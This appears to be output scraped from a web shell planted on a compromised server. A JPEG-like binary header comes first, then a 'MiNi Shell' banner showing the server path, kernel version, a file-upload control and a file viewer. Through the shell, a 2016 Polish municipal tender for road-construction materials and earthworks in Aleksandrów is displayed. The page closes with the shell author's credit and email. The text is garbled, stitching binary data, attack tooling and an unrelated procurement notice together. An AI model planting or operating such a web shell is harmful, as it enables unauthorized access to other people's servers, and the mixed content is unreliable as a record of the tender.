JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160630/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160630/113091-N-2016.html

<p class="kh_header"><b>Aleksandrów: Dostawa materiałów budowlanych oraz wykonanie robót ziemnych sprzętem mechanicznym dla inwestycji pn: Budowa zatok autobusowych, przebudowa chodników oraz wykonanie przejść dla pieszych w pasie  drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w miejscowości Aleksandrów, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa</b><br>
<b>Numer ogłoszenia: 113091 - 2016; data zamieszczenia: 30.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Aleksandrów , 23-408 Aleksandrów, woj. lubelskie, tel. 084 6875002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ealeksandrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów budowlanych oraz wykonanie robót ziemnych sprzętem mechanicznym dla inwestycji pn: Budowa zatok autobusowych, przebudowa chodników oraz wykonanie przejść dla pieszych w pasie  drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w miejscowości Aleksandrów, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów oraz wykonanie robót ziemnych sprzętem mechanicznym w ramach inwestycji związanej z budową zatok autobusowych, przebudową chodników oraz wykonanie przejść dla pieszych w pasie  drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w miejscowości Aleksandrów, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa.




Część 1 - Dostawa materiałów budowlanych

Przedmiotem zamówienia jest dostawa wraz z rozładunkiem niżej wymienionych materiałów budowlanych na plac budowy zlokalizowany  w miejscowości Aleksandrów w ciągu drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa.

Lp.	
Nazwa materiału budowlanego
	Jedn.	Ilość
1.		Balustrada U 11a szczeblinowa w wykonaniu z rur stalowych ocynkowanych lub cynkowanych  ogniowo, malowanych proszkowo, przęsła długości 250 cm	szt	9
2.		Beton zwykły z kruszywa naturalnego C20/25 (B-25)	- m3	- 12,9
3.		Beton zwykły z kruszywa naturalnego C8/10 (B-10)	- m3	- 11,9
4.		Beton zwykły z kruszywa naturalnego C12/15 (B-15)	- m3	- 75,0
5.		Papa asfaltowa izolacyjna	- m2	- 20

Część 2 - Dostawa materiałów budowlanych
Miejscem dostawy piasku jest plac budowy zlokalizowany w miejscowości Aleksandrów w ciągu drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa

Lp.	Nazwa materiału budowlanego	Jedn.	Ilość
1.		Piasek naturalny 0/2 do stosowania w budownictwie drogowym	- m3	- 480


Część 3 - Wykonanie robót ziemnych sprzętem mechanicznym

Miejscem wykonania robót jest plac budowy zlokalizowany w miejscowości Aleksandrów  
w ciągu drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa

Lp.	Nazwa sprzętu	Jedn.	Ilość
1.		Koparka jednonaczyniowa 0,15-0,25m3 do montażu - 172 mb kręgów betonowych (fi 50cm i fi 60cm), -	m-g	- 40
2.		Koparka jednonaczyniowa 0,15-0,25m3 do montażu 1szt studni betonowych fi 1500mm, -	m-g	- 4
3.		Koparka jednonaczyniowa 0,15-0,25m3 do rozbiórki łącznie 20 mb przepustów drogowych rurowych fi 30, 50 oraz 254 mb krawężników drogowych, - 	m-g 	- 35
4.		Koparka jednonaczyniowa 0,15-0,25m3 - wykopy liniowe  225m3 z załadunkiem, -	m-g -	28
5.		Koparka jednonaczyniowa 0,15-0,25m3 - wykopy liniowe 137m3 na odkład	, - m-g	- 8

Uwaga:
Podane w tabeli powyżej ilości maszyno-godzin przewidziane na wykonanie poszczególnych prac stanowią ilości szacunkowe służące do obliczenia ceny oferty brutto w celu porównania złożonych ofert. Rozliczenie robót nastąpi na podstawie faktycznej ilości wykonanych maszyno-godzin pracy sprzętu. Określone przez zamawiającego szacunkowe ilości maszyno-godzin nie stanowią zobowiązania do zlecenia wykonania robót w podanej ilości, z tego tytułu Zamawiający nie będzie ponosił żadnych konsekwencji.

Uwaga:
Jeżeli w niniejszej SIWZ oraz w załączonych do niej dokumentach opisano przedmiot zamówienia ze wskazaniem określeń/oznaczeń o których mowa w art. 29 ust 3 i art. 30 ust 1- 3 ustawy - Prawo zamówień publicznych, należy przyjąć, że  wskazaniu takiemu towarzyszy określenie lub równoważny, równoważnie opisywanym.
Zgodnie z art. 30 ust 4 ustawy - Prawo zamówień publicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego (art.30 ust. 5 ustawy)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.00.00.00-0, 14.21.10.00-0, 45.11.21.00-6, 45.11.20.00-5, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik nr 2 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik nr 2 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik nr 2 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik nr 2 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku. Warunek ten zostanie uznany za spełniony jeżeli wykonawca złoży oświadczenie o jego spełnieniu wg wzoru stanowiącego załącznik nr 2 do SIWZ. Ocena spełnienia tego warunku dokonana będzie wg formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument(y) potwierdzający(e) jakość i przydatność piasku naturalnego 0/2 do stosowania w budownictwie drogowym zgodnie z obowiązującymi normami (dotyczy Części nr 2, przedmiotu zamówienia tj.: piasek naturalny 0/2 do stosowania w budownictwie drogowym)</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W przypadku gdy Wykonawca upoważni inną osobę do reprezentowania Wykonawcy i składania oświadczeń woli w jego imieniu należy złożyć stosowne pełnomocnictwo, które należy załączyć do oferty w formie oryginału lub kserokopii potwierdzonej notarialnie.
2)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności faktur - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Istotne postanowienia umowy  zawarte zostały we wzorze umowy stanowiącym Załącznik Nr 5a do SIWZ (dla Części 1), Załącznik Nr 5b do SIWZ (dla Części 2) oraz Załącznik Nr 5c do SIWZ (dla Części 3)
2.	Zgodnie z art. 144 ust. 1 ustawy Prawo Zamówień Publicznych zamawiający dopuszcza wprowadzenie zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach i zakresie:
1)	wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia (zmiana podatku VAT), Cena za wykonany przedmiot zamówienia zostanie powiększona lub zmniejszona o kwotę wynikającą z obowiązków nałożonych właściwymi przepisami od dnia ich wejścia w życie bez konieczności sporządzania aneksu do umowy.
2)	gdy niedotrzymanie pierwotnego terminu realizacji umowy, stanowi konsekwencję działania sił wyższych niezależnych od Wykonawcy, nie stanowiących jego i podwykonawców problemów organizacyjnych, których nie można było przewidzieć, poza zdarzeniami zwykłymi - Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy 
o czas niezbędny do usunięcia konsekwencji działania siły wyższej. Siła wyższa, o której mowa wyżej jest to zdarzenie niezależne od Wykonawcy, nie stanowiące jego problemów organizacyjnych, którego strony umowy nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogły przeciwdziała, a które uniemożliwią Wykonawcy wykonanie w części lub w całości jego zobowiązania wynikającego z niniejszej umowy. Siła  wyższa obejmuje w szczególności zdarzenia żywiołowe, jak bardzo niskie temperatury powietrza lub ciągłe ulewne deszcze uniemożliwiające zachowanie wymogów technologicznych
3)	zmiana formy organizacyjno-prawnej, przekształcenia lub połączenia Wykonawcy,
4)	zmiana danych teleadresowych lub numerów konta Zamawiającego lub Wykonawcy.
3.	Obowiązującą formą zmiany umowy jest forma pisemna pod rygorem nieważności w postaci aneksu do umowy z zastrzeżeniem ust. 2 pkt. 1.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugaleksandrow.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Aleksandrów, Aleksandrów Drugi 380, 23-408 Aleksandrów , pokój nr 17, w godz. 7:30-15:30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2016 godzina 11:00, miejsce: Urząd Gminy Aleksandrów, Aleksandrów Drugi 380, 23-408 Aleksandrów, pokój nr 6 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów budowlanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wraz z rozładunkiem niżej wymienionych materiałów budowlanych na plac budowy zlokalizowany  w miejscowości Aleksandrów w ciągu drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa.

Lp.	
Nazwa materiału budowlanego
	Jedn.	Ilość
1.		Balustrada U 11a szczeblinowa w wykonaniu z rur stalowych ocynkowanych lub cynkowanych  ogniowo, malowanych proszkowo, przęsła długości 250 cm	- szt	- 9
2.		Beton zwykły z kruszywa naturalnego C20/25 (B-25) -	m3	- 12,9
3.		Beton zwykły z kruszywa naturalnego C8/10 (B-10)	- m3	- 11,9
4.		Beton zwykły z kruszywa naturalnego C12/15 (B-15)	- m3	- 75,0
5.		Papa asfaltowa izolacyjna	- m2	- 20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności faktur - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów budowlanych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejscem dostawy piasku jest plac budowy zlokalizowany w miejscowości Aleksandrów 
w ciągu drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa

Lp.	Nazwa materiału budowlanego	Jedn.	Ilość
1.		Piasek naturalny 0/2 do stosowania w budownictwie drogowym	- m3	- 480

Przedmiot zamówienia - oznaczenie wg Wspólnego Słownika Zamówień (CPV): 
14211000-3   Piasek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.21.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności faktur - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie robót ziemnych sprzętem mechanicznym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejscem wykonania robót jest plac budowy zlokalizowany w miejscowości Aleksandrów  w ciągu drogi wojewódzkiej nr 853, Majdan Nowy - Tomaszów Lubelski, w  km 6+553,80 strona lewa,  w km 6+667,00 strona prawa, w  km 11+873,10 strona lewa, w km 11+948,40 strona prawa, w km 12+956,10 strona prawa, w km 14+064,74 strona prawa

Lp.	Nazwa sprzętu	Jedn.	Ilość
1.		Koparka jednonaczyniowa 0,15-0,25m3 do montażu -172 -mb kręgów betonowych (fi 50cm i fi 60cm), -	m-g	- 40
2.		Koparka jednonaczyniowa 0,15-0,25m3 do montażu 1szt studni betonowych fi 1500mm, - 	m-g	- 4
3.		Koparka jednonaczyniowa 0,15-0,25m3 do rozbiórki łącznie 20 mb przepustów drogowych rurowych fi 30, 50 oraz 254 mb krawężników drogowych, - 	m-g 	- 35
4.		Koparka jednonaczyniowa 0,15-0,25m3 - wykopy liniowe  225m3 z załadunkiem, -	m-g - 	28
5.		Koparka jednonaczyniowa 0,15-0,25m3 - wykopy liniowe 137m3 na odkład	, - m-g -	8

Uwaga:
Podane w tabeli powyżej ilości maszyno-godzin przewidziane na wykonanie poszczególnych prac stanowią ilości szacunkowe służące do obliczenia ceny oferty brutto w celu porównania złożonych ofert. Rozliczenie robót nastąpi na podstawie faktycznej ilości wykonanych maszyno-godzin pracy sprzętu. Określone przez zamawiającego szacunkowe ilości maszyno-godzin nie stanowią zobowiązania do zlecenia wykonania robót w podanej ilości, z tego tytułu Zamawiający nie będzie ponosił żadnych konsekwencji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.21.00-6, 45.11.20.00-5, 45.11.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności faktur - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com